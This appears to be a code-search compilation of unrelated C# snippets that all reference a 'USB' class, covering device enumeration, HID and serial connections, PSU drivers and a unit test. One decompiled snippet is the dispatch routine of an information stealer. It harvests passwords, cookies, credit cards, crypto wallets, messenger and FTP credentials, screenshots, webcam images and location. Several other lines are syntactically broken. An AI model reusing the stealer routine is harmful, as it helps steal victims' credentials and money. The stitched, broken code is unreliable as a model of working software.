public Form1() { InitializeComponent(); usb = USB.UsbInstance; usb.intDevice(); InitializeValue(); }
public ActionResult UserBasedSecurity(string key) { if (!((CustomPrincipal)User).CanViewAdminFeature("UserBasedSecurity")) { return(RedirectToAction("Index", "Home")); } string setEntity = key; var Db = new UserBasedSecurityContext(); var Datalist = Db.UserBasedSecurities.ToList(); var EntList = GeneratorBase.MVC.ModelReflector.Entities.Where(p => !p.IsAdminEntity && p.Associations.Where(q => q.Target == "IdentityUser").Count() > 0).ToList(); // var EntList = GeneratorBase.MVC.ModelReflector.Entities.ToList(); if (key == null && EntList.Count > 0) { if (Datalist != null && Datalist.Where(p => p.IsMainEntity).Count() > 0) { setEntity = Datalist.FirstOrDefault(p => p.IsMainEntity).EntityName; var Entity = ModelReflector.Entities.FirstOrDefault(p => p.Name == setEntity); if (Entity != null) { ViewData["AlreadySet"] = Entity.DisplayName; } else { ViewData["AlreadySet"] = setEntity; } } else { setEntity = EntList[0].Name; } } List <UserBasedSecurity> Data = new List <Models.UserBasedSecurity>(); if (Datalist != null && Datalist.Where(p => p.EntityName == setEntity && p.IsMainEntity).Count() > 0) { Data = Datalist; } else { List <string> entitiesAdded = new List <string>(); entitiesAdded.Add(setEntity); Data = GetGridData(Data, setEntity, setEntity, entitiesAdded); } ViewBag.EntityList = new SelectList(EntList, "Name", "DisplayName", setEntity); var RoleList = (new GeneratorBase.MVC.Models.CustomRoleProvider()).GetAllRoles().ToList(); RoleList.Add("All"); var adminString = System.Configuration.ConfigurationManager.AppSettings["AdministratorRoles"]; //CommonFunction.Instance.AdministratorRoles(); RoleList.Remove(adminString); ViewBag.Roles = new SelectList(RoleList, "", ""); USB DataUSB = new USB(Data); return(View(DataUSB)); }
// Token: 0x060000CC RID: 204 RVA: 0x0000B8C0 File Offset: 0x00009AC0 private static List <TreeViewUsbItem> AddHubNode(string HubPath, string HubNodeName) { UsbNodeInformation[] usbNodeInformation = USB.GetUsbNodeInformation(HubPath); if (usbNodeInformation != null) { TreeViewUsbItem treeViewUsbItem = new TreeViewUsbItem(); if (string.IsNullOrEmpty(usbNodeInformation[0].Name)) { treeViewUsbItem.Name = HubNodeName; } else { treeViewUsbItem.Name = usbNodeInformation[0].Name; } treeViewUsbItem.Data = usbNodeInformation[0]; if (usbNodeInformation[0].NodeType == USB_HUB_NODE.UsbHub) { treeViewUsbItem.Children = TreeViewUsbItem.AddPortNode(HubPath, usbNodeInformation[0].NumberOfPorts); } else { treeViewUsbItem.Children = null; } return(new List <TreeViewUsbItem>(1) { treeViewUsbItem }); } return(null); }
/// <summary> /// Load the usb devices that are already connected to the system /// </summary> private void LoadConnectedDevices() { try { DriveInfo[] driveInfos = DriveInfo.GetDrives(); foreach (var driveInfo in driveInfos) { //check if the drive is a usb drive USB.USBDevice device = USB.FindDriveLetter(driveInfo.Name.Substring(0, 2)); if (device != null) { if (driveInfo.IsReady && driveInfo.TotalSize > 0) { serial = DriveInformation.getSerial(driveInfo.Name); //USB.FindDriveLetter(driveInfo.Name.Substring(0, 2)).SerialNumber; //RegisterDevice(serial); loadDevice(driveInfo.Name); } } } statuslabel.Text = "Ready"; } catch (Exception ex) { MessageBox.Show(ex.ToString()); } }
private void RefreshPortname() { try { List <string> list = new List <string>(); string[] ports = USB.GetPorts(); //SerialPort.GetPortNames();// ComboBox[] PortcomboBox = { comboBoxOS, comboBoxF1, comboBoxF2 }; //this.BeginInvoke(new Action(() => //{ foreach (ComboBox combo in PortcomboBox) { combo.Items.Clear(); for (int i = 0; i < ports.Length; i++) { combo.Items.Add(ports[i]); } if (ports.Length > 0) { combo.SelectedIndex = ports.Length - 1; } } // })); } catch (Exception ex) { MessageBox.Show(ex.Message); } }
// Token: 0x0600009C RID: 156 RVA: 0x00008324 File Offset: 0x00006524 private static void Helper() { Passwords.GetPasswords(); FireFox.GetPasswordFirefox(); Internet_Explorer.Start(); Cookies.GetCookies(); Autofill.GetCAutofills(); Clipboard.GetText(); CreditCards.GetCreditCards(); History.GetHistory(); USB.GetUSB(); DesktopFiles.Inizialize(); Discord.GetDiscord(); Skype.GetSkype(); FTPClient.GetFileZilla(); ImClient.GetImClients(); MailClient.GoMailClient(); VPNClient.GetVPN(); HardwareInfo.GoInfo(); ScreenDektop.GetScreenshot("screenshot.jpg"); Steam.CopySteam(); Telegram.GetTelegram(); WebCam.GetWebCamPicture(); Wallets.GetWallets(); Location.GetLocation(false); }
// 枚举设备信息并输出到XML文档 private void buttonOpenXML_Click(object sender, RoutedEventArgs e) { String xmlFile = "UsbEnums.xml"; try { // 检测当前目录下是否可以创建文件 using (StreamWriter sw = new StreamWriter(xmlFile)) { sw.Close(); } } catch (Exception) { // 当前目录无法创建文件,改到我的文档目录下 xmlFile = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + "\\" + xmlFile; } if (USB.EnumUsbToXML(xmlFile)) { // 判断文件是否存在 if (System.IO.File.Exists(xmlFile)) { // 打开文件 Splash.Diagnostics.Extensions.ShellExecute(xmlFile); return; } } MessageBox.Show("Failed!"); return; }
private void portRefresh() { //ComboBox cbnMine = new ComboBox(); foreach (Control c in extendedPanel1.Controls) { if (c is MetroFramework.Controls.MetroComboBox) { c.Click += delegate(object sender, EventArgs e) { ((ComboBox)sender).Items.Clear(); try { List <string> list = new List <string>(); string[] ports = USB.GetPorts(); //SerialPort.GetPortNames();// ((ComboBox)sender).Items.Clear(); for (int i = 0; i < ports.Length; i++) { ((ComboBox)sender).Items.Add(ports[i]); } if (ports.Length > 0) { ((ComboBox)sender).SelectedIndex = ports.Length - 1; } } catch (Exception ex) { MetroMessageBox.Show(this, ex.Message, "Error", MessageBoxButtons.OK); } }; } } }
/// <summary> /// Hub节点 /// </summary> /// <param name="HubPath">Hub路径</param> /// <param name="HubNodeName">节点显示名称</param> /// <returns>Hub节点集合</returns> private static List <UsbPortTree> AddHubNode(String HubPath, String HubNodeName) { UsbNodeInformation[] NodeInfoCollection = USB.GetUsbNodeInformation(HubPath); if (NodeInfoCollection != null) { UsbPortTree HubNode = new UsbPortTree(); //HubNode.Icon = ImageHub; if (String.IsNullOrEmpty(NodeInfoCollection[0].Name)) { HubNode.Name = HubNodeName; } else { HubNode.Name = NodeInfoCollection[0].Name; } HubNode.Data = NodeInfoCollection[0]; if (NodeInfoCollection[0].NodeType == USB_HUB_NODE.UsbHub) { HubNode.Children = AddPortNode(HubPath, NodeInfoCollection[0].NumberOfPorts); } else { HubNode.Children = null; } return(new List <UsbPortTree>(1) { HubNode }); } return(null); }
static void MainSafe(string[] Args) { Console.Write("Finding USB fan device ... "); int Dev = USB.OpenUSBDevice(3141, 29024); if (Dev == -1) { Console.WriteLine("FAIL"); Console.ReadLine(); return; } else { Console.WriteLine("OK"); } string[] DataLines = File.ReadAllLines("fage.txt"); foreach (var DataLine in DataLines) { byte[] DataArray = DataLine.Split(';').Where((In) => !string.IsNullOrWhiteSpace(In)).Select((In) => byte.Parse(In)).ToArray(); fixed(byte *DataArrayPtr = DataArray) { USB.WriteUSB(Dev, (IntPtr)DataArrayPtr, DataArray.Length, out int Written); USB.ReadUSB(Dev, (IntPtr)DataArrayPtr, 3, out int Read); } } USB.CloseUSBDevice(Dev); Console.WriteLine("Done!"); Console.ReadLine(); }
static void CheckUSB3() { var hostCtrls = USB.GetHostControllers(); foreach (var hostCtrl in hostCtrls) { var hub = hostCtrl.GetRootHub(); foreach (var port in hub.GetPorts()) { if (port.IsDeviceConnected && !port.IsHub) { var device = port.GetDevice(); Console.WriteLine("Product: " + device.Product); Console.WriteLine("Instance: " + device.InstanceID); Console.WriteLine("Name: " + device.Name); Console.WriteLine("Serial: " + device.SerialNumber); Console.WriteLine("Speed: " + port.Speed); Console.WriteLine("Port: " + device.PortNumber + Environment.NewLine); } } } //Console.ReadLine(); }
/// <summary> /// 自动检测E100设备插拔事件 /// </summary> /// <param name="sender"></param> /// <param name="e"></param> private void USBEventHandler(Object sender, EventArrivedEventArgs e) { bool isClose = false; if (e.NewEvent.ClassPath.ClassName == "__InstanceCreationEvent") { //设备插入 } else if (e.NewEvent.ClassPath.ClassName == "__InstanceDeletionEvent") { //设备拔出 } foreach (USBControllerDevice device in USB.WhoUSBControllerDevice(e)) { string strUsb = device.Dependent.Replace("\\", "").Replace("&", "").ToUpper().Substring(0, 24); //WatchDog.WriteMsg(DateTime.Now.ToString()+"==设备ID:"+str_usb); if (strUsb == "USBVID_03EBPID_6133MI_00")//USBVID_03EBPID_6133MI_007755BC1500000设备ID号 { _isExpection = false; serialPortOption.CreateInstance().IsExitExpection = true; EzUsb.RemoveUSBEventWatcher(); isClose = true; } } if (isClose) { Close(); } }
internal LinkDeviceModern(USB.BaseUSBDevice usbDevice, byte channel) : base(usbDevice, channel) { lock (subDeviceLock) { RefreshCoreValues(); } }
public void USBChanged(EventArrivedEventArgs e) { //PnPEntityInfo Element = GetCameraEntity(e.NewEvent as ManagementObject); USB.WhoUSBControllerDevice(e); //ManagementObject mbo = e.NewEvent["TargetInstance"] as ManagementObject; //will get the mbo value:null //PnPEntityInfo Element = GetCameraEntity(mbo); GetManagementBaseObjectProperties(e.NewEvent); }
// Token: 0x06000738 RID: 1848 RVA: 0x0002A6FC File Offset: 0x000288FC private void FindGGUSB() { foreach (USB.USBController current in USB.GetHostControllers()) { USB.USBHub rootHub = current.GetRootHub(); this.ProcessHub(rootHub); } }
void MainWindow_Loaded(object sender, RoutedEventArgs e) { HwndSource source = HwndSource.FromHwnd(new WindowInteropHelper(Application.Current.MainWindow).Handle); IntPtr handle = new WindowInteropHelper(Application.Current.MainWindow).Handle; source.AddHook(new HwndSourceHook(WndProc)); USB.RegisterHandle(handle); }
public MainPageViewModel() { Application.Current.MainWindow.Loaded += MainWindow_Loaded; refreshtimer.Interval = TimeSpan.FromMilliseconds(100); refreshtimer.Tick += Refreshtimer_Tick; ReportInput = new ObservableCollection <ReportByte>(); ReportOutput = new ObservableCollection <ReportByte>(); IsConnected = false; IsConnectByPIDVID = false; SendByOutputReport = true; UpdateAvalibleDevices(); Сommand_Connect = new RelayCommand((p) => { USB.OnSpecifiedDeviceRemoved += Usb_OnSpecifiedDeviceRemoved; USB.OnDataRecieved += Usb_OnDataRecieved; if (IsConnectByPIDVID) { IsConnected = USB.Open(DeviceVID, DevicePID); } else { IsConnected = USB.Open(SelectedDevice); } if (IsConnected) { RaisePropertyChanged("USB"); for (UInt16 i = 0; i < USB.SpecifiedDevice.InputReportLength; i++) { ReportInput.Add(new ReportByte() { Color = Brushes.Black, Data = 0x00 }); } UpdateOutputReport(); } }, (p) => (SelectedDevice != null && !IsConnected)); Сommand_Disconnect = new RelayCommand((p) => { IsConnected = false; ReportInput.Clear(); ReportOutput.Clear(); USB.OnSpecifiedDeviceRemoved -= Usb_OnSpecifiedDeviceRemoved; USB.OnDataRecieved -= Usb_OnDataRecieved; USB.Close(); }, (p) => IsConnected); Сommand_WriteReport = new RelayCommand((p) => { SendReportToDevice(); }, (p) => IsConnected); }
private void Get_USB() { USB usb = new USB(); DriveInfo[] s = DriveInfo.GetDrives(); foreach (DriveInfo drive in s) { if (drive.DriveType == DriveType.Removable) { //盘符 = drive.Name.ToString(); break; } } ManagementClass cimobject = new ManagementClass("Win32_DiskDrive"); ManagementObjectCollection moc = cimobject.GetInstances(); foreach (ManagementObject mo in moc) { if (mo.Properties["InterfaceType"].Value.ToString() == "USB") { try { //产品名称 //mo.Properties["Caption"].Value.ToString(); //总容量 //mo.Properties["Size"].Value.ToString(); string[] info = mo.Properties["PNPDeviceID"].Value.ToString().Split('&'); string[] xx = info[3].Split('\\'); //序列号 xx[1] //MessageBox.Show("U盘序列号:" + xx[1] + "\n" + xx[0]); = mo.Properties["Caption"].Value.ToString(); usb.ID = xx[1]; usbs.Add(usb); comboBox1.Items.Add(; //PNPDeviceID.Text = xx[1]; //xx = xx[0].Split('_'); //版本号 //REV.Text = xx[1]; //制造商ID //xx = info[1].Split('_'); //VID.Text = xx[1]; } catch (Exception ex) { MessageBox.Show(ex.Message); } } } }
public MainController(MainWindow x, AttitudeData y) { this._main = x; this._data = y; this._usb = new USB(x, y, this); this._usbConnected = false; this.setDataAddress(); this.refreshComports(); }
public static Form warning_form = null; // 네트워크 연결 알림폼 private void USBConnectionProcess() // USB 연결관리 쓰레드가 수행할 기능 { CheckForIllegalCrossThreadCalls = false; // 크로스 쓰레드 문제발생을 해결 while (true) // 무한루프를 통한 지속점검 { if (running == false) { running = true; driveName = USB.USB_Connection_Check(); // USB 연결여부를 가져옴 if (!String.IsNullOrEmpty(driveName)) // USB가 하나라도 연결된 경우 { connection = true; // USB 연결이 감지됨 this.Opacity = 1.0; // 폼을 보이도록 함 if (NetworkInterface.GetIsNetworkAvailable()) { Network.Disable_Network(); // 네트워크를 연결해지함 if (warning_form == null) { warning_form = new Forms.Network_Warning(); warning_form.ShowDialog(); } } if (!working) // 파일 암/복호화 동작중이 아닌경우 { files = Files.Get_Files(driveName); // 연결된 USB의 모든 파일리스트를 가져옴 (파일현황 주기적 갱신) } if (!mode) // 파일 보관모드인경우에만 암호화 처리 { Files.Encrypt(files, password); // 비동기방식으로 연결된 USB의 모든 파일을 암호화함 } } else // USB 연결이 제거된 경우 { if (!NetworkInterface.GetIsNetworkAvailable()) // 네트워크 연결이 되지 않는 경우 { if (deny) // 해당 프로그램에 의해 네트워크를 차단한 경우 { Network.Enable_Network(); // 네트워크를 다시 연결함 } } this.Opacity = 0; // 폼을 숨김 connection = false; // USB 연결이 제거됨 working = false; // 프로그램을 파일 보관모드로 변경 } running = false; Thread.Sleep(2000); // 무한루프 중 부하방지를 위해 쓰레드에 일시 휴식 부여 } } }
public static void Main(string[] args) { Application.Init(); USB win = new USB(); win.Show(); // win.Resize(320, 200); win.ShowAll(); Application.Run(); }
IntPtr WndProc(IntPtr hwnd, int msg, IntPtr wParam, IntPtr lParam, ref bool handled) { USB.ParseMessages(msg, wParam); if (msg == Win32Usb.WM_DEVICECHANGE && (wParam.ToInt32() == Win32Usb.DEVICE_ARRIVAL || wParam.ToInt32() == Win32Usb.DEVICE_REMOVECOMPLETE)) { UpdateAvalibleDevices(); } return(IntPtr.Zero); }
protected override void ControlsToData() { if (_bus == null) { _bus = new USB(); } base.ControlsToData(); var usb = (USB)_bus; usb.Version = versionIdentifierControl.VersionIdentifier; }
/// <summary> /// Do work - process sensor data /// </summary> /// <param name="sender"></param> /// <param name="e"></param> private void AcquisitionWorker_DoWork(object sender, DoWorkEventArgs e) { backgroundIsFinished_ = false; BackgroundWorker worker = sender as BackgroundWorker; while (!worker.CancellationPending) //Do the work { foreach (USBdevice_GUI USB in USBdevices) { SingleTact singleTact = USB.singleTact; SingleTactFrame newFrame = singleTact.ReadSensorData(); //Get sensor data if (null != newFrame) //If we have data { USB.addFrame(newFrame); // use first timestamp only to quantise readings and match csv output AddData(USBdevices[0].lastTimeStamp, newFrame.SensorData, USB); //Add to stripchart } else // USB has been unplugged { new Thread(() => { guiTimer_.Stop(); backgroundIsFinished_ = true; var index = USBdevices.IndexOf(USB); var comPort = comPortList[index]; var result = MessageBox.Show( comPort.ToString() + " has been unplugged.\nWould you like to save your data before exiting?", "Error!", MessageBoxButtons.YesNo, MessageBoxIcon.Error); if (result == DialogResult.Yes) { buttonSave_Click(this, null); } Application.Exit(); }).Start(); backgroundIsFinished_ = false; StopAcquisitionThread(); break; } //Calculate rate double delta = newFrame.TimeStamp - USB.lastTimeStamp; // calculate delta relative to previous sensor's last reading if (delta != 0) { measuredFrequency_ = measuredFrequency_ * 0.95 + 0.05 * (1.0 / (delta)); //Averaging } //measuredFrequency_ = 1/delta; USB.setTimestamp(newFrame.TimeStamp); } } }
private void createDevices() { //Console.WriteLine("Creating Device Objects..."); List <Device> new_devices = new List <Device>(); foreach (var dev in _devices) { switch (dev.module_type) { case 0: //unknown break; case 1: // *** Smartplug *** SmartPlug smartplug = new SmartPlug(dev); new_devices.Add(smartplug); break; case 2: // *** Bluetooth *** Bluetooth bluetooth = new Bluetooth(dev); new_devices.Add(bluetooth); break; case 3: // *** USB *** USB usb = new USB(dev); new_devices.Add(usb); break; case 4: // *** Infrared *** Infrared infrared = new Infrared(dev); new_devices.Add(infrared); break; case 5: // *** Industrial *** Industrial industrial = new Industrial(dev); new_devices.Add(industrial); break; case 6: // *** Multiboard *** Multiboard multiboard = new Multiboard(dev); new_devices.Add(multiboard); break; case 7: // *** Audio *** Audio audio = new Audio(dev); new_devices.Add(audio); break; default: break; } } _devices.Clear(); _devices.AddRange(new_devices); }
private void start_adc() { int ret; hdev = USB.InitFindAndOpenDevice(0xfffe, 0x00ff); ret = libUSB_Interface.usb_set_configuration(hdev, 1); ret = libUSB_Interface.usb_claim_interface(hdev, 0); ret = libUSB_Interface.usb_set_altinterface(hdev, 0); ret = libUSB_Interface.usb_clear_halt(hdev, 0x02); ret = libUSB_Interface.usb_clear_halt(hdev, 0x86); }
public override void ApplyPropertyValues() { Setup.ApplyPropertyValues(); InputOutput.ApplyPropertyValues(); USB.ApplyPropertyValues(); MIDI.ApplyPropertyValues(); #region DefaultMemory Track1.ApplyPropertyValues(); Track2.ApplyPropertyValues(); Track3.ApplyPropertyValues(); Track4.ApplyPropertyValues(); Track5.ApplyPropertyValues(); Rhythm.ApplyPropertyValues(); //Name.ApplyPropertyValues(); Master.ApplyPropertyValues(); RecOption.ApplyPropertyValues(); PlayOption.ApplyPropertyValues(); Assign1.ApplyPropertyValues(); Assign2.ApplyPropertyValues(); Assign3.ApplyPropertyValues(); Assign4.ApplyPropertyValues(); Assign5.ApplyPropertyValues(); Assign6.ApplyPropertyValues(); Assign7.ApplyPropertyValues(); Assign8.ApplyPropertyValues(); Assign9.ApplyPropertyValues(); Assign10.ApplyPropertyValues(); Assign11.ApplyPropertyValues(); Assign12.ApplyPropertyValues(); Assign13.ApplyPropertyValues(); Assign14.ApplyPropertyValues(); Assign15.ApplyPropertyValues(); Assign16.ApplyPropertyValues(); InputFx.ApplyPropertyValues(); TrackFx.ApplyPropertyValues(); BeatFxA.ApplyPropertyValues(); BeatFxB.ApplyPropertyValues(); BeatFxC.ApplyPropertyValues(); InputFxA.ApplyPropertyValues(); InputFxB.ApplyPropertyValues(); InputFxC.ApplyPropertyValues(); TrackFxA.ApplyPropertyValues(); TrackFxB.ApplyPropertyValues(); TrackFxC.ApplyPropertyValues(); #endregion DefaultMemory }
internal static BaseLinkDevice CreateNew(USB.BaseUSBDevice usbDevice, byte channel, byte deviceType) { switch (deviceType) { case 0x5: return new LinkDeviceModern(usbDevice, channel); case 0x3: return new LinkDeviceAFP(usbDevice, channel); case 0x1: return LinkDevicePSU.CreateNew(usbDevice, channel); default: return null; } }
internal static LinkDevicePSU CreateNew(USB.BaseUSBDevice usbDevice, byte channel) { LinkDevicePSU genericPSU = new LinkDevicePSU(usbDevice, channel); string psuName = genericPSU.GetInternalName(); if (psuName == "AX1200i") return new LinkDevicePSUAX1200i(usbDevice, channel); if (psuName == "AX1500i") return new LinkDevicePSUAX1500i(usbDevice, channel); if (psuName.StartsWith("HX") && psuName != "HX1200i" && psuName != "HX1000i") return new LinkDevicePSUHXiNoRail(usbDevice, channel); if (psuName.StartsWith("HX")) return new LinkDevicePSUHX(usbDevice, channel); return genericPSU; }
public void ZmianaPortuIPrzeslaniePonownieDanych() { IWtyczka sata = new SATA(); IWtyczka usb = new USB(); DyskHDD dysk = new DyskHDD(sata); string dane = "Jakieœ dane"; dysk.WgrajDane(dane); dysk.PrzepnijPort(usb); dysk.WgrajDane(dane); Assert.AreEqual(dane, usb.PrzeslijDane()); }
//+1 byte reserved public override byte[] ToArray() { var arr = base.ToArray(); arr[0x2] = USB.LoByte(); arr[0x3] = USB.HiByte(); arr[0x4] = DeviceClass; arr[0x5] = DeviceSubClass; arr[0x6] = DeviceProtocol; arr[0x7] = MaxPacketSize; arr[0x8] = NumberOfConfigurations; arr[0x9] = 0; //Reserved return(arr); }
public override void OnReceive(Context context, Intent intent) { Logger.LogInfo(nameof(DisconnectReceiver), nameof(OnReceive), "called."); Logger.LogInfo(nameof(DisconnectReceiver), nameof(OnReceive), "Intent was: " + intent.Action); if (intent.Action == UsbManager.ActionUsbAccessoryDetached) { var acceesory = (UsbAccessory)intent.GetParcelableExtra(UsbManager.ExtraAccessory); if (acceesory != null) { USB.CloseUSBConnection(); } } }
/// <summary> /// Creates a clone of this instance /// </summary> /// <returns>Clone of this instance</returns> public object Clone() { return(new Channels { HTTP = (Channel)HTTP.Clone(), Telnet = (Channel)Telnet.Clone(), File = (Channel)File.Clone(), USB = (Channel)USB.Clone(), AUX = (Channel)AUX.Clone(), Daemon = (Channel)Daemon.Clone(), CodeQueue = (Channel)CodeQueue.Clone(), LCD = (Channel)LCD.Clone(), SPI = (Channel)SPI.Clone(), AutoPause = (Channel)AutoPause.Clone() }); }
internal LinkDeviceAFP(USB.BaseUSBDevice usbDevice, byte channel) : base(usbDevice, channel) { }
internal BaseLinkDevice(USB.BaseUSBDevice usbDevice, byte channel) : base(usbDevice) { this.usbDevice = usbDevice; = channel; }
internal LinkDevicePSUAX1200i(USB.BaseUSBDevice usbDevice, byte channel) : base(usbDevice, channel) { }
internal LinkDevicePSUHXiNoRail(USB.BaseUSBDevice usbDevice, byte channel) : base(usbDevice, channel) { }